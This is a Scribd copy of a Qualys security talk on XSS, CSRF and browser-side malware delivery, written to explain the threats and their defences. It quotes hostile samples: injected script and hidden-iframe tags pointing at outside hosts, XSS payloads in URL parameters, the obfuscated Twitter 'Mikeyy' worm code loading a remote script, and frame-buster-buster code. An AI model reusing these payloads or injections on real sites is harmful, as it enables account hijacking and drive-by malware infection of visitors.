Scribd Logo
Upload

Welcome to Scribd!

  • 25 views

    When HTML Goes Bad

    Uploaded by

    Garyo
    This document discusses various web application security issues such as XSS, CSRF, and malware delivery techniques. It covers how attacks have evolved from targeting web servers to targeting web browsers via compromised web applications. Various countermeasures are discussed along with how browsers and development practices can help mitigate these risks.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    When HTML Goes Bad

    Uploaded by

    Garyo
    25 views22 pages
    This document discusses various web application security issues such as XSS, CSRF, and malware delivery techniques. It covers how attacks have evolved from targeting web servers to targeting web browsers via compromised web applications. Various countermeasures are discussed along with how browsers and development practices can help mitigate these risks.

    Original Description:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses various web application security issues such as XSS, CSRF, and malware delivery techniques. It covers how attacks have evolved from targeting web servers to targeting web browsers via compromised web applications. Various countermeasures are discussed along with how browsers and development practices can help mitigate these risks.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    25 views22 pages

    When HTML Goes Bad

    Uploaded by

    Garyo
    This document discusses various web application security issues such as XSS, CSRF, and malware delivery techniques. It covers how attacks have evolved from targeting web servers to targeting web browsers via compromised web applications. Various countermeasures are discussed along with how browsers and development practices can help mitigate these risks.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 22

    When HTML Goes Bad

    Inside XSS, CSRF, and Malware...

    Mike Shema
    Security Research Engineer, Qualys Inc.

    When HTML Goes Bad

    XSS (HTML injection) CSRF (HTTP actuation) Malware (game over...)

    Money
    Attacks refocus from web server to web browser via the web application Compromise the web application in order to use it as a delivery mechanism
    Infect rather than deface Automated SQL injection attacks infected tens of thousands of web sites

    Us and Them
    ...exploit the system to gain admin access
    Requires shell code Install keylogger, network sniffer, botnet Search for documents, credentials,

    ...exploit the browser


    No shell code required Access financial information Access e-mail Access social network

    Poles Apart
    Desktop
    Access controls Process separation Anti-virus

    Browser
    Same Origin Policy Blocks pop-ups Blocks third-party cookies Tabs! Database (HTML5)

    Safe Links?
    http://bit.ly/2z3MBj http://bit.ly/z18Rv http://bit.ly/OApJX http://bit.ly/lSxst http://bit.ly/wszWO http://bit.ly/A6Ca http://tinyurl.com/6q2ab9
    6

    Infection
    <script src=http://_.cn> <iframe src="http://_.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>

    Behind the Scenes


    http://website/page.cgi?user=Machine <html><body> Welcome to the Machine ... http://website/page.cgi?user=<script>... <html><body> Welcome to the <script>... ...

    Behind the Scenes


    http://website/page.cgi?redirect=http://website/otherpage. html <html><body> Welcome to the Machine <a href=http://website/otherpage.html>link</a> ... http://website/page.cgi?redirect=+onclick=alert(echoes) ;a= <html><body> Welcome to the Machine <a href= onclick=alert(echoes);a=>link</a> ...

    So You Think You Can Tell...

    +ADw-script+AD4/lorem ipsem/.source

    10

    Careful With That AJAX, Eugene


    var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20 %73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e %74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2 e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20 %73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e %74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2 e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>

    11

    XSS
    Character encoding
    Valid, but unexpected Invalid, but rendered

    Payload encoding
    JavaScript obfuscation Browser-specific quirk

    12

    Unusual Suspects
    Flash PDF Images Browser quirks

    13

    Where Are the Worms?


    MySpace (old, so very, very old) Twitter No large web app worm has been truly weaponized

    14

    CSRF
    Taking advantage of the design of HTML & HTTP Forcing state onto a non-stateful transport Forced workflows

    15

    Frame Busting
    if (top != self) { top.location.replace(self.location.href); } <script type="text/javascript"> var prevent_bust = 0; window.onbeforeunload = function(){ prevent_bust++ } setInterval(function() { if (prevent_bust > 0) {prevent_bust -= 2; window.top.location = 'http://server-which-responds-with204.com'} }, 1) </script> http://www.codinghorror.com/blog/archives/001277.html http://stackoverflow.com/questions/958997/frame-buster-busterbuster-code-needed
    16

    Malware
    Drive-by download Safe browsing lists Blacklisted domains Anti-detection mechanisms
    if (navigator.systemLanguage=='zh-cn') {} else{ document.writeln("<iframe src=http://_.com/img/info.htm width=0 height=0></iframe>");

    17

    Bricks in the Wall


    Coding practices
    Frameworks Libraries

    Black list vs. white list Rectify vs. reject Inoculation

    18

    Another Brick in the Wall


    User base
    xssed, ha.ckers.org

    Web application scanners Source code scanners

    19

    Browser Evolution
    Move more countermeasures into the browser
    Process isolation Anti-XSS Anti-CSRF Behavioral anti-virus

    20

    A New Machine
    HTML5
    Cross-document messaging a.k.a. Some Other Origins, Too Database

    Expanding the attack surface Increasing the information store

    21

    Thank You!
    During Live Presentation Please Use Your WebEx Q&A Panel to Submit Questions

    To Request a 14-day Free Trial of our Web Application Scanning Solution, email: was-info@qualys.com

    22

    You might also like